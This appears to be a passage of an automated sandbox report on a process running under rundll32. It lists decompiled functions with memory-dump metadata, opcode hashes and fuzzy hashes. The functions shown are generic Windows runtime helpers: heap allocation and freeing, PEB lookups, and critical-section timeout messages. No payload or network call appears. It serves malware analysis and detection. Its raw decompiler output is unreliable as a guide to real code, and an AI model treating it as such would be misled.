				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E045EEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                                            0x046553ca
                                                                                            0x046553ce
                                                                                            0x046553d9
                                                                                            0x046553de
                                                                                            0x046553e1
                                                                                            0x046553e1
                                                                                            0x046553e6
                                                                                            0x046553f3
                                                                                            0x00000000
                                                                                            0x046553f8
                                                                                            0x046553fb

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                            • Instruction ID: 501eefa92bd92d0a8dae53e365140fd204e72f893cfdf8374bbba4b31698d8cc
                                                                                            • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                            • Instruction Fuzzy Hash: 04E08C32910680ABCF12DB49CA54F5EB7F9FB84B00F140004A4095B730D624BC00CB40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046035A1 Relevance: .0, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E046035A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E045EEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                                            0x046035a1
                                                                                            0x046035a1
                                                                                            0x046035a5
                                                                                            0x046035ab
                                                                                            0x046035ab
                                                                                            0x046035b5
                                                                                            0x00000000
                                                                                            0x046035c1
                                                                                            0x046035b7

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                            • Instruction ID: 1da38643b27339078fbb33aae46626b5bd7c85b1320b8ab5964f38ebebb0e010
                                                                                            • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                            • Instruction Fuzzy Hash: 0AD0A73151158099DB0BAB10C12476A3375BB4030AF58505588010D7F1E335ED8AD600
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045EAAB0 Relevance: .0, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E045EAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                                            0x045eaab6
                                                                                            0x045eaabb
                                                                                            0x0463a442
                                                                                            0x00000000
                                                                                            0x0463a448
                                                                                            0x0463a454
                                                                                            0x0463a454
                                                                                            0x045eaac1
                                                                                            0x045eaac1
                                                                                            0x045eaac6
                                                                                            0x045eaac6

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                            • Instruction ID: 63e7e5b9202fcf1cce7cb5482d7e2a96f21ff1389fc4279cad1878bcdc8c956c
                                                                                            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                            • Instruction Fuzzy Hash: 6ED0E935352A80CFD71ACF5DC954B1573A4BB44B45FC50490E541CBB62E62CED54DA00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0465A537 Relevance: .0, Instructions: 11COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0465A537(intOrPtr _a4, intOrPtr _a8) {

				return L045F8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                                            0x0465a553

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                            • Instruction ID: 111ba71ab00b79db5ca0aa25a3585a17150ac96f001f3b2d6970a8f7559e8a0c
                                                                                            • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                            • Instruction Fuzzy Hash: D2C01232080648BBCB126E81CC00F067B2AFB94B60F008010BA080A5608632E970EA84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045DDB40 Relevance: .0, Instructions: 11COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E045DDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L045F4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                                            0x045ddb4d
                                                                                            0x045ddb54
                                                                                            0x045ddb5f
                                                                                            0x045ddb56
                                                                                            0x045ddb56
                                                                                            0x045ddb5c
                                                                                            0x045ddb5c

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                            • Instruction ID: 72bf8e6c51874f288d528cd73cfea4710dc133b8c372cd0a722ded007af33cfe
                                                                                            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                            • Instruction Fuzzy Hash: A5C08C30280A41ABFB321F20CD01B0136A0BF51B49F4400A06300DA0F0DB78E901FA00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045DAD30 Relevance: .0, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E045DAD30(intOrPtr _a4) {

				return L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                                            0x045dad49

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                            • Instruction ID: 35c651e9ba464c1b043c56c6c04c7720ce301689744cb87a7e2fb90fd0c471c5
                                                                                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                            • Instruction Fuzzy Hash: BEC08C32080648BBC7126A45CD00F017B29E794B60F000020B6040A661C932F861E588
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045F3A1C Relevance: .0, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E045F3A1C(intOrPtr _a4) {
				void* _t5;

				return L045F4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                                            0x045f3a35

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                            • Instruction ID: 34274488eb7ad575b650dd69a6cccc137b359e2b32a9dc5c93711ff15b4ac3cc
                                                                                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                            • Instruction Fuzzy Hash: 3CC08C32080248BBCB126E41DC00F027B29E7A0B60F000020B7040A5608532ED60E988
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046036CC Relevance: .0, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E046036CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                                            0x046036d2
                                                                                            0x046036e8
                                                                                            0x046036d4
                                                                                            0x046036e5
                                                                                            0x046036e5

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                            • Instruction ID: 7f3fd94597dc36f5d89acd673de075f8d45c6afe40d05012b832869be9058730
                                                                                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                            • Instruction Fuzzy Hash: ACC02B70260440FBEB191F30CD00F167254F760B22F6403547320496F0F528BC00E500
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045E76E2 Relevance: .0, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E045E76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                                            0x045e76e4
                                                                                            0x00000000
                                                                                            0x045e76f8
                                                                                            0x045e76fd

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                            • Instruction ID: 02c0eae911d4d59d2f178c2c7e5571dfd12e9a410397328dd331f1f950006b8a
                                                                                            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                            • Instruction Fuzzy Hash: 71C08C701525809AEB2E6F09CE20B303650BB0C74CF48019CAA21094A1C368B803E208
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045F7D50 Relevance: .0, Instructions: 7COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E045F7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                            0x045f7d56
                                                                                            0x045f7d5b
                                                                                            0x045f7d60
                                                                                            0x045f7d5d
                                                                                            0x045f7d5d
                                                                                            0x045f7d5d

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                            • Instruction ID: 56c3d00746460d89c8604758b864390545c8b0d405b5dabe9d7795e6faa56b26
                                                                                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                            • Instruction Fuzzy Hash: 5BB092343019409FCF16DF18C580B1533E4BB48A40B8400D0E400CBA20D229E8009900
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04602ACB Relevance: .0, Instructions: 5COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04602ACB() {
				void* _t5;

				return E045EEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                                            0x04602adc

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                            • Instruction ID: 7d3343ff42b4766a3711f9b4d9ecc9d2f76dec64e1ec8f57c555168be516c98c
                                                                                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                            • Instruction Fuzzy Hash: 65B01233C20441CFCF06EF40C610B297335FB40750F054490900127930C228BC01DB40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0466FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 53%
                                                                                            			E0466FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0461CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04665720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04665720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                            0x0466fdda
                                                                                            0x0466fde2
                                                                                            0x0466fde5
                                                                                            0x0466fdec
                                                                                            0x0466fdfa
                                                                                            0x0466fdff
                                                                                            0x0466fe0a
                                                                                            0x0466fe0f
                                                                                            0x0466fe17
                                                                                            0x0466fe1e
                                                                                            0x0466fe19
                                                                                            0x0466fe19
                                                                                            0x0466fe19
                                                                                            0x0466fe20
                                                                                            0x0466fe21
                                                                                            0x0466fe22
                                                                                            0x0466fe25
                                                                                            0x0466fe40

                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0466FDFA
                                                                                            Strings
                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0466FE01
                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0466FE2B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                            • API String ID: 885266447-3903918235
                                                                                            • Opcode ID: b958b8d0f738640300b0fd622b7f81e49b54128a0e7cdf41be068df8172342fd
                                                                                            • Instruction ID: dc15cf1775478a06eb1203a7fa925f76baeb2337e23f9eca21a290da340e242b
                                                                                            • Opcode Fuzzy Hash: b958b8d0f738640300b0fd622b7f81e49b54128a0e7cdf41be068df8172342fd
                                                                                            • Instruction Fuzzy Hash: 5DF0F632640601BFE6241A85EC02F23BF5AEB44730F140318F629565E1FA62F830D6F8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%